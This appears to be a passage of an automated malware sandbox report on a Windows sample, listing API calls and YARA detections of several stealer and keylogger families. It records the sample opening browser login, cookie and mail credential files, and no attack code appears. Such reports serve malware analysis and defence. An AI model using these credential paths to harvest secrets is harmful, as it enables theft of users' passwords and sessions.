Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetLocaleInfoA,	4_2_028FA7C4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_028F5BD8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetLocaleInfoA,	4_2_028FA810
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: GetLocaleInfoA,	10_2_00417A20
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	13_2_02905ACC
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	13_2_02905BD7
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: GetLocaleInfoA,	13_2_0290A810
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: GetLocaleInfoA,	14_2_00417A20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: GetLocaleInfoA,	14_1_00417A20
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	15_2_02875ACC
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	15_2_02875BD7
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: GetLocaleInfoA,	15_2_0287A810

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_028F920C GetLocalTime,

4_2_028F920C

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_028FB78C GetVersionExA,

4_2_028FB78C

Source: C:\Users\Public\Libraries\npratlsN.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 6036, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3463602515.000000002B9EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3457231521.00000000218FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 6036, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\npratlsN.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\Libraries\npratlsN.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\npratlsN.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
